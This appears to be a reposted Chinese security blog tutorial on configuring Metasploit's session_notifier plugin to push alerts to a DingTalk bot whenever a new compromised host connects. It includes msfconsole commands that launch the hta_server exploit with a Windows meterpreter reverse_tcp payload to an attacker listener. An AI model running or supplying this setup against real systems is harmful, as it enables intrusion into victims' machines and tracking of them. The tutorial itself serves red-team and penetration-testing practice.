全部話題標籤:#Web安全 #漏洞復現 #工具使用 #權限提高#權限維持 #防禦繞過 #內網安全 #實戰案例 #其餘筆記 #資源分享 #MSFjavascript |
0x01 前言java
https://github.com/rapid7/metasploit-framework/pull/13571git
0x01 釘釘機器人webhook配置github
0x02 session_notifier插件配置web
kali~# msfconsole -q :msf6 > load session_notifiermsf6 > set_session_dingtalk_webhook https://oapi.dingtalk.com/robot/send?access_token=msf6 > start_session_notifier
restart_session_notifier //從新啓動會話通知save_session_notifier_settings //將全部會話通知設置保存到框架set_session_dingtalk_webhook //設置DingTalk會話通知(關鍵字: session)set_session_maximum_ip //設置會話通知最大IP範圍set_session_minimum_ip //設置會話通知最小IP範圍set_session_mobile_carrier //設置手機的移動運營商set_session_mobile_number //設置您要通知的10位手機號碼set_session_smtp_address //設置會話通知SMTP地址set_session_smtp_from //設置SMTP發件人set_session_smtp_password //設置SMTP密碼set_session_smtp_port //設置會話通知SMTP端口set_session_smtp_username //設置SMTP用戶名start_session_notifier //開始會話通知stop_session_notifier //中止會話通知
隨便設置了一個hta_server監聽模塊來測試一下看是否可以實時收到新上線主機的通知。
windows
msf6 > use exploit/windows/misc/hta_server msf6 exploit(windows/misc/hta_server) > set target 1msf6 exploit(windows/misc/hta_server) > set payload windows/x64/meterpreter/reverse_tcpmsf6 exploit(windows/misc/hta_server) > set lhost 39.**.*.238msf6 exploit(windows/misc/hta_server) > set lport 443msf6 exploit(windows/misc/hta_server) > exploit
這裏咱們能夠看到釘釘羣組裏已經成功的收到了機器人發送過來的新上線主機通知信息!!!api
禁止非法,後果自負安全
歡迎關注公衆號:web安全工具庫微信
本文分享自微信公衆號 - web安全工具庫(websec-tools)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。session